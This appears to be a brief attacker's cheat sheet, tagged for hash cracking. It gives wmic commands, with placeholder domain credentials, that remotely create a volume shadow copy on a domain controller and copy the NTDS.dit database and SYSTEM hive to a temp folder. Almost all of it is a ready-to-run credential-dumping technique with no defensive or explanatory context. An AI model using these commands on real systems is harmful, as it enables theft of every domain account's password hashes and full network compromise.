STEP 1: Use ‘wmi’ to execute ‘vssadmin’ to create new volume shadow copy:
wmic /node:DC_hostname /user:DOMAIN\Username /password:password123 process call create "cmd /c vssadmin create shadow /for=C: 2>&1"
wmic /node:DC_hostname /user:DOMAIN\Username /password:password123 process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\temp\ntds.dit 2>&1"
wmic /node:DC_hostname /user:DOMAIN\Username /password:password123 process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM\ C:\temp\sys_backup.hiv 2>&1"
C:\temp\ntds.dit
C:\temp\sys_backup.hiv
#hashcrack